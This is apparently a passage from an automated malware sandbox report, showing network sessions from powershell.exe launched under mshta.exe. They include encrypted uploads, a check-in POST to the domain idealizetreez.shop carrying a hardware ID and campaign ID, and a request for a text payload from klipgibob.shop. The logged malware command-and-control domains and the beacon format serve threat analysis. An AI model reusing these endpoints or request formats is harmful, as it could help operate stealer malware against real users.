                                                                                            Data Ascii: KYKvh/$6TYt4(R/B#Q/rXLl7V\tok<KAkD`-B$F^}+4+@M*Dd!O)NLT2!UH"GP&?}e][o`u&AJO~<gAd>6@aNq=S3+u@s7]$
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: a6 d3 29 35 27 f7 fb 4e f6 2a 16 bf 2a 12 9c f2 41 73 8d 71 7d 2b 09 e0 ed 8d f7 dd a7 95 bb 5b 4e 05 a7 00 90 20 2b 33 76 71 36 ad 18 df 17 94 ed 6a 35 c6 73 48 ab c9 2f 80 a5 c4 27 f3 70 5f 81 16 e7 a6 4e 32 ca c0 0b 94 6e 37 ba ce 9e 3b c3 6c 58 3b 68 e7 79 d7 18 bf 39 fe be e8 43 75 27 e4 8e 68 1e f4 f0 56 74 7b e2 7d 32 9d 84 9f cf 5f 1d ae a8 74 6d 35 39 16 4e 1d f7 5b d9 fc fb f8 c1 b8 0a d9 0c 0e b8 cf 60 a6 d7 a7 af 67 56 d8 69 80 a5 47 bc 20 7f b0 5b 5b 7d ad 96 bf 4b 77 7e ad f9 95 a0 79 e8 60 cf 64 33 35 60 f3 37 1b 4d cf 1f d4 c4 42 8c c4 8b cc 20 f3 ed bd 85 f7 f2 87 36 2a c6 a3 b5 a9 c2 55 6b cc e4 54 5e 02 98 af 32 57 8b 1f 1c f2 7f 80 83 9b b1 cc 5d 80 21 fe d2 51 12 30 4b 3a b0 c1 17 f8 00 4d 12 4d df bf e6 0d 24 d0 06 c5 b8 39 76 15 4d
                                                                                            Data Ascii: )5'N**Asq}+[N +3vq6j5sH/'p_N2n7;lX;hy9Cu'hVt{}2_tm59N[`gViG [[}Kw~y`d35`7MB 6*UkT^2W]!Q0K:MM$9vM
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: af fc f4 8f be c9 c3 28 d8 85 69 fe b8 04 cc 59 6e 37 08 75 3a 2b 4b 44 bc e9 82 ed e6 3d ed 00 8c 1a 57 4f 08 80 d4 e8 f9 bb 1a d2 40 4c 17 98 82 d6 72 e0 21 6e 34 fc 88 5e bd b7 ef 22 5d 0c 04 a2 38 fd 61 74 14 90 b8 83 1b fb c1 b3 ec 07 61 d9 bf 20 86 08 fb 59 7c fe fe 85 a4 f1 ed 23 64 10 bd 32 3b 1f 0b 97 cb dd 40 d9 01 77 d9 30 31 60 97 9d 55 d0 da 8c bf 14 19 5f 8e f5 3a f9 b4 cd 51 7f ce 72 a4 3a e6 e6 24 4f 87 24 2c 25 b4 47 e4 4f 6f 0a 53 83 b0 59 b2 dd a6 33 43 4e 14 15 09 87 7b a2 cf 03 3c c4 3e 2d 85 e5 22 18 00 da d0 61 54 ee 41 8a e8 ab 6a 3f cb 88 5d 23 5c 1d 4f 9c 63 c3 31 d1 3c 02 77 ff 7c 37 fa a3 db 8c fd c3 47 ee 9b f6 48 45 22 e6 59 2e 9e 3b 39 2d 4f 22 10 8d 8d 85 79 b0 a6 6d 94 73 fc fc e5 0b e5 e5 9b 12 73 97 fb 6d ee 92 45 d8 07
                                                                                            Data Ascii: (iYn7u:+KD=WO@Lr!n4^"]8ata Y|#d2;@w01`U_:Qr:$O$,%GOoSY3CN{<>-"aTAj?]#\Oc1<w|7GHE"Y.;9-O"ymssmE
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 44 06 a3 36 c1 c6 b5 a5 ce 8d 57 ef b9 b7 56 c6 c1 b4 28 b0 bb b0 bd 53 19 f1 07 ff 43 c3 67 f3 01 c1 27 9f 0f bc df 83 46 dc 13 90 32 09 0a 64 f1 d3 dc 20 ed 42 0c f5 15 04 57 ca a9 81 ee 84 33 a0 20 b5 57 13 0a 3a a4 58 20 0a fe c8 f5 c9 9d f4 71 1f 76 de 0f 1a 37 b7 fb a7 f5 e2 53 ce f0 cc bf b3 9b 59 80 ad 2e d2 df e3 b9 b0 d3 57 97 6d 32 9d 79 50 bd d9 ea 35 e9 a2 b2 51 20 9c 10 29 9b 1a 79 8f 6b 47 c7 d1 4f ce fb 26 25 f8 f2 0c 79 57 fc df 12 11 8f 9f 7e b6 f8 a9 00 f9 49 64 2b ff 31 e2 31 70 0c 51 89 4e 7f 33 42 79 7f d0 0e ee 94 61 c8 ce ee 40 5d 3b 1d 8f 22 f1 68 a0 2e 88 d4 8e 59 fb a1 cf cd 00 a2 8b 3c 42 39 d7 74 d4 08 5d 31 70 29 f9 f5 93 a7 ac ac dd 0a 93 7c 98 2d f4 bc 75 63 96 7a 12 39 69 4c 8c ab 33 01 bf 84 5f c4 af 4f cb 55 c5 79 c4 de
                                                                                            Data Ascii: D6WV(SCg'F2d BW3 W:X qv7SY.Wm2yP5Q )ykGO&%yW~Id+11pQN3Bya@];"h.Y<B9t]1p)|-ucz9iL3_OUy
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 28 e0 71 6f 21 16 30 b1 43 df 5e 94 29 6b 24 5e 5f 2d a0 24 c0 54 6b a3 13 61 3a 7d 68 45 8d 01 68 19 77 68 02 a0 d9 49 6e 6c 5d fe ee bd ee d0 a4 e5 f1 b8 fc 1c bb 94 2b 9f 8b 97 05 43 5a 27 47 c3 4f 2e 3c 7e b7 1b 51 d6 52 7f 69 f4 f3 ad 56 c1 97 a8 cb 05 37 17 56 17 c9 44 e4 c2 ff 1e b5 2c 43 2e 3a f7 6d 31 9a e5 8e 8c 7d 27 7c be fc 39 9b a7 f5 66 34 27 e1 3b 7b 63 34 91 b6 a2 c8 d8 c1 52 f0 20 0e 8f 4d ce 52 82 3f a8 30 d8 bf b8 71 e8 b4 28 38 55 4d cc 3c 73 cf 84 e7 29 c7 fa a1 29 2f 38 99 7a 30 2f 87 6f a1 6d d1 cd 91 fa 66 ab 24 7a 7e f5 15 81 37 59 fc c6 b7 eb 30 33 5a dd 63 cf ab 91 f7 55 b6 88 ec c3 76 1a dc 5f d6 61 54 55 f0 41 a7 4b 0f 89 c4 c5 aa 55 73 4d d8 31 6d 2a 47 bf bf 7c eb 73 eb c2 81 a0 8c 57 d7 25 e2 cf cc 32 9c 3f 13 28 aa 80 e9
                                                                                            Data Ascii: (qo!0C^)k$^_-$Tka:}hEhwhInl]+CZ'GO.<~QRiV7VD,C.:m1}'|9f4';{c4R MR?0q(8UM<s))/8z0/omf$z~7Y03ZcUv_aTUAKUsM1m*G|sW%2?(
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 1b 81 18 96 c1 51 f4 ed ef a8 74 de 58 d8 af a6 f4 44 21 1f 98 c1 41 65 54 3b 8a fd 38 1b ef 77 cd bc fe e2 b6 ff c9 0b c1 e7 af b4 d9 ab 69 2d be af 9a 85 2e d9 9d c5 1a a5 1b 14 9e 2b 15 7e 30 55 b6 6a f0 56 d3 d6 56 9c 25 ab b9 8f a9 94 ee 7a ed 94 76 9b 94 c3 79 29 3e 53 52 60 d0 72 5b 62 8c c3 87 3d d1 74 9f e5 5d e1 41 ef 16 b6 20 ec 55 76 8c 16 cd 58 f4 7e 6d d1 d2 ab 74 f3 63 43 83 e8 d6 69 39 c4 b9 48 ea 2a ef c0 8a 14 65 1c 47 4b 35 2e da 2c ce dd 28 f8 16 90 42 d1 e7 dc 7f d1 ec 91 2f f7 fc 7d ca d6 6d 76 ce e8 87 72 51 ae d7 ed 72 9b 3a 69 eb b3 36 66 ef e9 37 4b e7 6f 37 bf 7b f5 36 74 fa 51 4e fb 4a 88 e0 22 b3 2d 6b bf 65 ae 94 42 c5 15 21 72 b9 8d 38 f7 0d e2 c8 fc ab 97 53 6e 9f ac 67 57 24 ca 57 92 3b fd 2d 54 2e 58 04 57 bd 0b bb ee f1
                                                                                            Data Ascii: QtXD!AeT;8wi-.+~0UjVV%zvy)>SR`r[b=t]A UvX~mtcCi9H*eGK5.,(B/}mvrQr:i6f7Ko7{6tQNJ"-keB!r8SngW$W;-T.XW
                                                                                            2025-01-15 17:25:48 UTC1137INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=qrje4pev43p3f7gcjv23if5ma2; expires=Sun, 11 May 2025 11:12:26 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqDIfCdf00PRcwGgfllYIxdWB0Ymqsgh3PTwrndRn4iab86HYjPYpN6yI2MOuZKVTzMk7dSBV0EckRIUTZkL2EcfAVL5r%2F7Ak8OzEDm6ddhEYKUv8CNdHLXR%2B%2FduRz8xA%2BtxvJM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 90279121eef8de95-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1462&rtt_var=665&sent=210&recv=602&lost=0&retrans=0&sent_bytes=2846&recv_bytes=590065&delivery_rate=1512953&cwnd=245&unsent_bytes=0&cid=2653a24070b668a9&ts=2515&x=0"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.657694104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:49 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 81
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:49 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 52 49 49 49 26 6a 3d 26 68 77 69 64 3d 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--RIII&j=&hwid=0E71FDD4B91D2055A5CBFEF1C5D8D84E
                                                                                            2025-01-15 17:25:49 UTC1133INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=9he0crtu7mc4rcqsvva8etvv77; expires=Sun, 11 May 2025 11:12:28 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GIYy%2FzyNB4gu13mJTOr60uUrfa%2BdIzOLp8xTPEVQMrzlj5LajLs2a35YOCGtuExZ5QAt%2B2y7d%2Bpi%2BQiOHv2ZZl4I2kQ46VQjHC9Xn88ymKjKRTwHea15%2BdYvZIuWRm5AyYZNGI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902791370a1ec358-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1562&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=983&delivery_rate=1819314&cwnd=155&unsent_bytes=0&cid=691dd14939a5bb79&ts=493&x=0"
                                                                                            2025-01-15 17:25:49 UTC138INData Raw: 38 34 0d 0a 4b 57 70 4b 39 44 77 6b 61 5a 52 4c 4c 45 78 53 63 4d 58 70 6e 5a 4c 31 4e 75 45 64 55 75 44 65 41 6c 6d 43 51 4f 49 78 73 4a 74 79 45 57 69 42 48 68 35 4c 2f 44 39 59 50 43 46 4b 6d 63 62 42 76 5a 35 61 69 47 30 31 69 62 78 74 4f 36 77 7a 69 6c 37 41 78 77 59 44 4a 49 42 6a 52 77 58 6b 46 42 52 30 61 6b 6a 72 6e 65 58 6d 31 78 72 44 65 79 62 43 35 44 4a 31 6f 43 58 41 43 34 44 6d 64 41 3d 3d 0d 0a
                                                                                            Data Ascii: 84KWpK9DwkaZRLLExScMXpnZL1NuEdUuDeAlmCQOIxsJtyEWiBHh5L/D9YPCFKmcbBvZ5aiG01ibxtO6wzil7AxwYDJIBjRwXkFBR0akjrneXm1xrDeybC5DJ1oCXAC4DmdA==
                                                                                            2025-01-15 17:25:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.657702172.67.212.454436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:50 UTC205OUTGET /int_clp_8888.txt HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Host: klipgibob.shop
                                                                                            2025-01-15 17:25:50 UTC807INHTTP/1.1 403 Forbidden
                                                                                            Date: Wed, 15 Jan 2025 17:25:50 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gzl5x1vpf3rLPmKG21%2BjRwQsi2eUqbYUQxJepG4nv7QK6JEwRzeXFK6ccoomV%2FPU46Ab4k8v2vpQCHxgGxTO%2FPrAPYXB7gysTbiDnNhDAdehSLCHGmmVzioTc%2F1H0pIMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 9027913d6d6eaac5-YYZ
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=13780&min_rtt=13779&rtt_var=5171&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2865&recv_bytes=819&delivery_rate=211686&cwnd=32&unsent_bytes=0&cid=3c144a9a0b8205bb&ts=239&x=0"
                                                                                            2025-01-15 17:25:50 UTC562INData Raw: 34 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20
                                                                                            Data Ascii: 4197<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Forbidden</title>
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 23 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 6d 61 69 6e 20 3e 20 73 65 63 74 69 6f 6e 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d
                                                                                            Data Ascii: y: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 65 74 3f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20
                                                                                            Data Ascii: et?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section>
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 36 34 2e 30 32 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 37 36 2e 31 38 32 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 35 32 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 37 35 2e 39 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 30 5f 6c 69 6e 65 61 72 5f 35 33 5f 37 33 39 29 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: 055DC" stroke-width="2" /> <rect x="64.026" y="76.1826" width="100.522" height="175.914" fill="url(#paint0_linear_53_739)" /> <rect
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3d 22 35 2e 31 31 20 35 2e 31 31 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 2d 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 34 36 2e 37 39 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 2e 32 34 39 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 34 30 37 39 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78
                                                                                            Data Ascii: stroke-linejoin="round" stroke-dasharray="5.11 5.11" /> <rect x="-1" y="1" width="146.798" height="21.2497" rx="2.40792" transform="matrix
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 31 35 2e 31 36 32 20 31 36 37 2e 33 38 31 43 32 31 34 2e 37 31 37 20 31 36 38 2e 38 32 32 20 32 31 33 2e 31 38 39 20 31 36 39 2e 36 32 38 20 32 31 31 2e 37 34 39 20 31 36 39 2e 31 38 33 43 32 31 30 2e 33 30 38 20 31 36 38 2e 37 33 38 20 32 30 39 2e 35 30 32 20 31 36 37 2e 32 31 20 32 30 39 2e 39 34 37 20 31 36 35 2e 37 37 43 32 31 30 2e 33 39 32 20 31 36 34 2e 33 33 20 32 31 31 2e 39 32 20 31 36 33 2e 35 32 33 20 32 31 33 2e 33 36 20
                                                                                            Data Ascii: BF5" stroke="#0055DC" stroke-width="2" /> <path d="M215.162 167.381C214.717 168.822 213.189 169.628 211.749 169.183C210.308 168.738 209.502 167.21 209.947 165.77C210.392 164.33 211.92 163.523 213.36
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 36 36 2e 31 38 32 20 37 39 2e 32 38 39 43 32 36 36 2e 38 32 39 20 38 32 2e 38 36 39 37 20 32 37 30 2e 32 35 36 20 38 35 2e 32 34 38 33 20 32 37 33 2e 38 33 36 20 38 34 2e 36 30 31 37 43 32 37 37 2e 34 31 37 20 38 33 2e 39 35 35 31 20 32 37 39 2e 37 39 36 20 38 30 2e 35 32 38 32 20 32 37 39 2e 31 34 39 20 37 36 2e 39 34 37 35 43 32 37 38 2e 35 30 33 20 37 33 2e 33 36 36 38 20 32 37 35 2e 30 37 36 20 37 30 2e 39 38 38 32 20 32 37 31 2e 34 39 35 20 37 31 2e 36 33 34 38 43 32 36 37 2e 39 31 34 20 37 32 2e 32 38 31 33 20 32 36 35 2e 35 33 36 20 37 35 2e 37 30 38 32 20 32 36 36 2e 31 38 32 20 37 39 2e 32 38 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20
                                                                                            Data Ascii: th d="M266.182 79.289C266.829 82.8697 270.256 85.2483 273.836 84.6017C277.417 83.9551 279.796 80.5282 279.149 76.9475C278.503 73.3668 275.076 70.9882 271.495 71.6348C267.914 72.2813 265.536 75.7082 266.182 79.289Z" fill="#6ECCE5"
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 37 39 2e 32 35 37 20 39 30 2e 32 32 33 31 43 32 37 31 2e 35 32 32 20 39 31 2e 36 31 39 39 20 32 36 34 2e 31 31 38 20 38 36 2e 34 38 31 34 20 32 36 32 2e 37 32 32 20 37 38 2e 37 34 36 43 32 36 31 2e 33 32 35 20 37 31 2e 30 31 30 36 20 32 36 36 2e 34 36 33 20 36 33 2e 36 30 37 35 20 32 37 34 2e 31 39 39 20 36 32 2e 32 31 30 38 43 32 38 31 2e 39 33 34 20 36 30 2e 38 31 34 20 32 38 39 2e 33 33 37 20 36 35 2e 39 35 32 34 20 32 39 30 2e 37 33 34 20 37 33 2e 36 38 37 38 43 32 39 32 2e 31 33 31 20 38 31 2e 34 32 33 32 20 32 38 36 2e 39 39 32 20 38 38 2e 38 32 36 33 20 32 37 39 2e 32 35 37 20 39 30 2e 32 32 33 31 5a 4d 32 36 30 2e 32 39 39 20 37 39 2e 31 38 33 35 43 32 36 31 2e 39 33 38 20 38 38 2e 32 35
                                                                                            Data Ascii: d" d="M279.257 90.2231C271.522 91.6199 264.118 86.4814 262.722 78.746C261.325 71.0106 266.463 63.6075 274.199 62.2108C281.934 60.814 289.337 65.9524 290.734 73.6878C292.131 81.4232 286.992 88.8263 279.257 90.2231ZM260.299 79.1835C261.938 88.25
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 2e 32 39 39 20 32 35 2e 34 34 33 38 4c 32 34 35 2e 37 35 34 20 32 36 2e 30 38 33 39 4c 32 34 34 2e 33 31 34 20 31 38 2e 31 30 37 34 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 32 33 36 2e 33 32 36 20 32 39 2e 36 31 36 36 4c 32 34 34 2e 33 30 32 20 32 38 2e 31 37 36 33 4c 32 34 34 2e 39 34 33 20 33 31 2e 37 32 31 34 4c 32 33 36 2e 39 36 36 20 33 33 2e 31 36 31 37 4c 32 33 36 2e 33 32 36 20 32 39 2e 36 31 36 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74
                                                                                            Data Ascii: .299 25.4438L245.754 26.0839L244.314 18.1074Z" fill="#0055DC" /> <path d="M236.326 29.6166L244.302 28.1763L244.943 31.7214L236.966 33.1617L236.326 29.6166Z" fill="#0055DC" /> <pat
                                                                                            2025-01-15 17:25:50 UTC1369INData Raw: 35 31 2e 37 35 38 20 33 31 33 2e 39 36 32 20 31 36 31 2e 38 36 39 20 33 31 33 2e 34 36 31 20 31 38 30 2e 33 31 36 43 33 31 32 2e 39 35 36 20 31 39 38 2e 38 39 36 20 33 30 37 2e 30 35 31 20 32 31 37 2e 38 34 35 20 32 39 38 2e 33 39 36 20 32 33 31 2e 39 32 39 43 32 38 39 2e 35 30 39 20 32 34 36 2e 33 39 31 20 32 37 38 2e 39 33 35 20 32 35 33 2e 39 35 36 20 32 36 39 2e 37 34 20 32 35 33 2e 37 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                                                            Data Ascii: 51.758 313.962 161.869 313.461 180.316C312.956 198.896 307.051 217.845 298.396 231.929C289.509 246.391 278.935 253.956 269.74 253.706Z" fill="white" stroke="#C5EBF5" stroke-width="12" /> <path


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:12:24:59
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                            Wow64 process (32bit):true
